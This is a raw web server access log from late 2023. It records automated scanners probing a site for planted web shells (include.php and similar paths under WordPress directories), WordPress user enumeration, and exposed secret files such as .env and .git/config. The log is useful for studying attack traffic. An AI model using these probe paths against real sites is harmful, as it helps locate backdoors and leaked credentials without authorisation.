[15/Nov/2023:22:09:47 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [15/Nov/2023:22:10:01 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [15/Nov/2023:22:10:28 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [15/Nov/2023:22:10:57 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [15/Nov/2023:22:11:18 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 34.247.178.250 - - [17/Nov/2023:03:07:27 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 34.247.178.250 - - [17/Nov/2023:03:07:29 +0700] "GET / HTTP/1.1" 301 162 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 205.210.31.233 - - [18/Nov/2023:03:03:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [18/Nov/2023:14:24:08 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [18/Nov/2023:14:24:19 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [18/Nov/2023:14:24:28 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [18/Nov/2023:14:24:36 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [18/Nov/2023:14:24:48 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [18/Nov/2023:14:25:01 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [18/Nov/2023:14:25:15 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [19/Nov/2023:12:06:08 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 199.45.155.19 - - [19/Nov/2023:14:44:42 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 5.101.156.211 - - [20/Nov/2023:22:34:09 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 5.101.156.211 - - [20/Nov/2023:22:34:12 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 5.101.156.211 - - [20/Nov/2023:22:34:15 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 205.210.31.28 - - [21/Nov/2023:00:55:21 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 208.109.78.84 - - [22/Nov/2023:02:42:52 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 208.109.78.84 - - [22/Nov/2023:02:42:55 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 208.109.78.84 - - [22/Nov/2023:02:42:59 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 183.136.225.5 - - [22/Nov/2023:11:29:53 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" 91.92.252.169 - - [22/Nov/2023:23:32:24 +0700] "GET /max.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [22/Nov/2023:23:32:34 +0700] "GET /.xas.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 198.235.24.40 - - [22/Nov/2023:23:56:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 23.178.112.103 - - [23/Nov/2023:10:17:39 +0700] "GET /.well-known/acme-challenge/E4L39wgGGuG8rstIe05B4kGFH8z-ZzXAcx_QpPfykZI HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 18.221.220.50 - - [23/Nov/2023:10:17:39 +0700] "GET /.well-known/acme-challenge/E4L39wgGGuG8rstIe05B4kGFH8z-ZzXAcx_QpPfykZI HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 167.172.20.95 - - [23/Nov/2023:10:18:06 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 167.172.20.95 - - [23/Nov/2023:10:18:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084438) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 167.172.20.95 - - [23/Nov/2023:10:18:07 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:08 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:08 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:08 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:09 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:09 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:10 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:10 +0700] "GET /_all_dbs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (l9scan/2.0.633323e223e2335313e2330313; +https://leakix.net)" 167.172.20.95 - - [23/Nov/2023:10:18:11 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:11 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:12 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:12 +0700] "GET /s/633323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:13 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:13 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 167.172.20.95 - - [23/Nov/2023:10:18:14 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 51.195.94.201 - - [23/Nov/2023:12:18:20 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 51.195.94.201 - - [23/Nov/2023:12:18:21 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 3.120.41.114 - - [24/Nov/2023:05:11:23 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 3.120.41.114 - - [24/Nov/2023:05:11:24 +0700] "GET / HTTP/1.1" 301 162 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 165.22.224.99 - - [24/Nov/2023:09:39:25 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 157.245.202.27 - - [24/Nov/2023:13:27:25 +0700] "GET /wordpress/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)" 47.128.37.45 - - [24/Nov/2023:19:10:07 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 198.235.24.43 - - [24/Nov/2023:19:30:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.167 - - [25/Nov/2023:14:48:04 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 3.143.245.163 - - [27/Nov/2023:14:35:54 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.57 Whale/3.14.133.23 Safari/537.36" 91.92.252.169 - - [27/Nov/2023:20:35:06 +0700] "GET /sample.php?pd=1&mapname=ova-tools.xml HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/Nov/2023:20:35:35 +0700] "GET /chosen.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 50.62.222.40 - - [28/Nov/2023:00:08:09 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 50.62.222.40 - - [28/Nov/2023:00:08:13 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 50.62.222.40 - - [28/Nov/2023:00:08:16 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 198.235.24.127 - - [28/Nov/2023:11:54:44 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [28/Nov/2023:19:21:58 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [28/Nov/2023:19:22:10 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [28/Nov/2023:19:22:27 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [28/Nov/2023:19:22:49 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [28/Nov/2023:19:23:02 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [28/Nov/2023:19:23:13 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [28/Nov/2023:19:23:34 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.68.134.6 - - [29/Nov/2023:15:06:04 +0700] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.68.134.6 - - [29/Nov/2023:15:06:06 +0700] "GET /old/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.68.134.6 - - [29/Nov/2023:15:06:08 +0700] "GET /wordpress/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.68.134.6 - - [29/Nov/2023:15:06:10 +0700] "GET /backup/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.68.134.6 - - [29/Nov/2023:15:06:12 +0700] "GET /OLD/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.68.134.6 - - [29/Nov/2023:15:06:14 +0700] "GET /blog/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 38.68.134.6 - - [29/Nov/2023:15:06:15 +0700] "GET /wp/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 67.205.12.218 - - [29/Nov/2023:20:50:33 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 67.205.12.218 - - [29/Nov/2023:20:50:45 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 67.205.12.218 - - [29/Nov/2023:20:50:49 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 145.220.91.19 - - [29/Nov/2023:22:27:04 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x" 198.235.24.91 - - [01/Dec/2023:07:33:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [01/Dec/2023:09:49:01 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Dec/2023:09:49:22 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Dec/2023:09:49:35 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Dec/2023:09:49:51 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Dec/2023:09:50:03 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Dec/2023:09:50:13 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Dec/2023:09:50:33 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 159.223.48.151 - - [01/Dec/2023:11:16:18 +0700] "GET /wordpress/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)" 35.213.255.215 - - [01/Dec/2023:16:32:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.255.215 - - [01/Dec/2023:16:32:17 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.255.215 - - [01/Dec/2023:16:32:50 +0700] "GET /app-ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.255.215 - - [01/Dec/2023:16:32:50 +0700] "GET /ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.255.215 - - [01/Dec/2023:16:32:52 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.255.215 - - [01/Dec/2023:16:32:52 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.255.215 - - [01/Dec/2023:16:32:52 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 203.22.30.3 - - [02/Dec/2023:01:46:52 +0700] "HEAD / HTTP/1.1" 301 0 "-" "-" 203.22.30.3 - - [02/Dec/2023:01:47:11 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 205.210.31.43 - - [04/Dec/2023:04:32:32 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 195.170.172.138 - - [05/Dec/2023:00:18:23 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 195.170.172.138 - - [05/Dec/2023:00:18:28 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 195.170.172.138 - - [05/Dec/2023:00:18:31 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 18.203.134.57 - - [05/Dec/2023:05:06:33 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 54.155.15.137 - - [05/Dec/2023:08:18:43 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 91.92.252.169 - - [06/Dec/2023:10:17:23 +0700] "GET /radio.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 157.245.202.27 - - [07/Dec/2023:01:39:12 +0700] "GET /wp-content/plugins/royal-elementor-addons/assets/css/lib/animations/text-animations.min.css HTTP/1.1" 301 162 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)" 198.235.24.183 - - [07/Dec/2023:02:23:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 159.65.161.199 - - [08/Dec/2023:22:27:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 205.210.31.168 - - [09/Dec/2023:12:29:43 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 198.235.24.80 - - [09/Dec/2023:13:19:45 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [11/Dec/2023:02:33:36 +0700] "GET /admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [11/Dec/2023:02:33:42 +0700] "GET /general.php?pd=1&mapname=op.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 39.105.120.190 - - [12/Dec/2023:03:41:04 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 39.105.120.190 - - [12/Dec/2023:03:41:09 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 39.105.120.190 - - [12/Dec/2023:03:41:13 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; 